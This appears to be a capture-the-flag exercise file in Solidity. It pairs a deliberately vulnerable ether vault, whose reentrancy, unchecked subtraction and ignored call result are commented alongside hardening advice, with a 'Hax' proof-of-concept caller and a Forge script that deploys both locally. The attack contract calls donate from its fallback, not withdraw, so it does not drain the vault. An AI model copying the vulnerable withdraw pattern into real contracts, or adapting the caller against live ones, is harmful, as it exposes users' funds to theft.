π made with https://github.com/rerrorctf/ret
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.6.12; | |
import "openzeppelin-contracts-06/math/SafeMath.sol"; | |
import "forge-std/Script.sol"; | |
import "forge-std/console.sol"; | |
// Deliberately vulnerable ether vault used as the target of this exercise.
// Anyone can credit an address via donate(); the credited address can pull
// ether out again via withdraw(). withdraw() performs its external call
// before it updates the ledger, which is the reentrancy defect documented below.
contract Reentrance {
    using SafeMath for uint256;

    // Ledger of ether credited to each address, in wei.
    mapping(address => uint256) public balances;

    // Credits the ether attached to the call (msg.value) to `_to`.
    // The addition goes through SafeMath.add rather than a raw `+`.
    function donate(address _to) public payable {
        balances[_to] = balances[_to].add(msg.value);
    }

    // Returns the amount currently credited to `_who`.
    function balanceOf(address _who) public view returns (uint256 balance) {
        return balances[_who];
    }

    // Sends `_amount` wei to the caller if the ledger shows at least that much.
    //
    // Security notes (the code is intentionally left as-is):
    //  * Interaction before effect: the low-level call below hands control to
    //    msg.sender with no gas limit set, and the ledger is only decremented
    //    afterwards. A receiving contract that calls withdraw() again from its
    //    receive/fallback hook passes the balance check a second time, because
    //    the first decrement has not happened yet.
    //  * The decrement uses a raw `-=` instead of SafeMath.sub. Under the
    //    ^0.6.12 pragma arithmetic is unchecked, so repeated decrements after
    //    nested calls unwind can wrap below zero instead of reverting.
    //  * The call's success flag is not acted on: `_amount;` is a no-op
    //    expression, so a failed transfer still reduces the caller's balance.
    //
    // Hardening: apply checks-effects-interactions (decrement the ledger
    // before the external call), use SafeMath.sub or a compiler with checked
    // arithmetic, revert when the transfer fails, and/or add a reentrancy guard.
    function withdraw(uint256 _amount) public {
        if (balances[msg.sender] >= _amount) {
            // External call first: control leaves this contract here.
            (bool result,) = msg.sender.call{value: _amount}("");
            if (result) {
                _amount;
            }
            // State update last: too late to stop a nested withdraw().
            balances[msg.sender] -= _amount;
        }
    }

    // Accepts plain ether transfers without crediting any ledger entry.
    receive() external payable {}
}
// Minimal view of the vault's interface: only the two functions that the
// Hax contract calls.
interface IWithdraw {
    // Credits the attached ether to `_to` in the vault's ledger.
    function donate(address _to) external payable;

    // Asks the vault to send `_amount` wei back to the caller.
    function withdraw(uint256 _amount) external;
}
// Proof-of-concept caller for the Reentrance vault. It shows the shape of a
// contract whose ether-receiving hook calls back into the vault.
contract Hax {
    // Vault this contract talks to; set once in the constructor.
    IWithdraw draw;

    // Declared but never read or written by any function in this contract.
    bool public stop = false;

    // Deposits 0.001 ether into the vault under this contract's address and
    // immediately asks for the same amount back. The deployment must carry
    // at least 0.001 ether for the donate call to succeed.
    //
    // NOTE(review): a contract's runtime code is only stored once its
    // constructor returns, so the ether that withdraw() sends back here
    // presumably arrives without running fallback() below. Confirm with a trace.
    constructor(address _addr) public payable {
        draw = IWithdraw(_addr);
        draw.donate{value: 0.001 ether}(address(this));
        draw.withdraw(0.001 ether);
    }

    // Runs when this contract is called with ether (there is no receive()).
    // It calls back into the vault, but with donate() rather than withdraw(),
    // crediting itself another 0.002 ether. The call reverts if this
    // contract holds less than 0.002 ether at that point.
    fallback() external payable {
        draw.donate{value: 0.002 ether}(address(this));
    }
}
// Forge script that wires the exercise together against a locally deployed
// copy of the vault (not a pre-existing instance).
contract ReentranceHax is Script {
    // Deploys a fresh Reentrance vault, then a Hax contract funded with
    // 0.005 ether that points at it, inside a single broadcast window.
    function run() external {
        // No key is passed to startBroadcast here; the env-var variant below
        // is kept disabled so no private key is read by the script itself.
        // vm.startBroadcast(vm.envUint("PRIVATE_KEY"));
        vm.startBroadcast();

        Reentrance target = new Reentrance();
        address targetAddr = address(target);
        new Hax{value: 0.005 ether}(targetAddr);

        vm.stopBroadcast();
    }
}